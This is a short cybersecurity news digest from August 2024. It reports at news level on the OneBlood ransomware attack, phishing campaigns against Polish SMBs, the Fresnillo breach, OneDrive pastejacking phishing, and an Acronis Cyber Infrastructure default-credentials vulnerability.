MSP cybersecurity news digest, August 5, 2024

A ransomware attack has severely disrupted operations at one of the largest U.S. blood centers, OneBlood, affecting its ability to serve health care facilities across the southeast. OneBlood has 2,700 employees, their revenue in 2023 was $168.3 million.

This cyberattack has forced OneBlood to implement manual processes, significantly slowing down their operations and affecting blood inventory. In response, over 250 hospitals have activated critical blood shortage protocols to manage the supply.

OneBlood is collaborating with cybersecurity experts and authorities to resolve the issue while continuing to collect, test and distribute blood at reduced capacity.

Researchers have detailed widespread phishing campaigns targeting small and medium-sized businesses (SMBs) in Poland during May 2024, leading to the deployment of malware families like Agent Tesla, Formbook and Remcos RAT. Later, these campaigns extended over to Italy and Romania.

Attackers utilized compromised email accounts and company servers to spread malicious emails, host malware, and collect stolen data. The campaigns featured a malware loader called DBatLoader, marking a shift from the cryptors-as-a-service (CaaS) AceCryptor used in the second half of 2023.

The attacks began with phishing emails containing weaponized RAR or ISO attachments that, when opened, triggered a process to download and execute a trojan. The ISO files led to the execution of DBatLoader, while the RAR archives contained an obfuscated script to launch ModiLoader, ultimately deploying malware like Agent Tesla, Formbook and Remcos RAT to steal sensitive information.

Fresnillo PLC, the world’s largest silver producer with a revenue of $2.7 billion in 2023, reported a recent cyberattack that led to unauthorized access to its data.

In a filing with the London Stock Exchange, the company stated that its operations were unaffected and no financial or material impact was expected. Fresnillo initiated response measures and is investigating the breach with the help of external forensic experts.

Fresnillo operates several mines in Mexico and is listed on both the London and Mexican stock exchanges.

Researchers are alerting Microsoft OneDrive users about a new phishing campaign that deploys a malicious PowerShell script. The campaign uses social engineering tactics to trick users into executing the script and compromising their systems by that.

The attack, dubbed OneDrive Pastejacking, begins with an email containing an HTML file that mimics a OneDrive error page. Users are misled into opening a PowerShell terminal and pasting a Base64-encoded command, which then downloads and executes malicious files.

This campaign has targeted users in the U.S., South Korea, Germany, India and several other countries. The technique is part of a broader trend of phishing attacks that leverage deceptive emails and legitimate-looking forms to steal credentials and deploy malware.

Acronis has alerted customers to patch a critical security flaw in Cyber Infrastructure that allows attackers to bypass authentication using default credentials.

The flaw, tracked as CVE-2023-45249, enables remote code execution on unpatched servers without user interaction. Acronis Cyber Infrastructure (ACI) is a multitenant platform for cyber protection, integrating remote endpoint management, backup and virtualization.

The vulnerability, already patched nine months ago, affects several ACI builds before specific updates. Customers are advised to check their ACI build number and update to the latest version to ensure security. Acronis Cyber Protect Cloud, Acronis Cyber Protect and Acronis True Image customers are not affected by the vulnerability.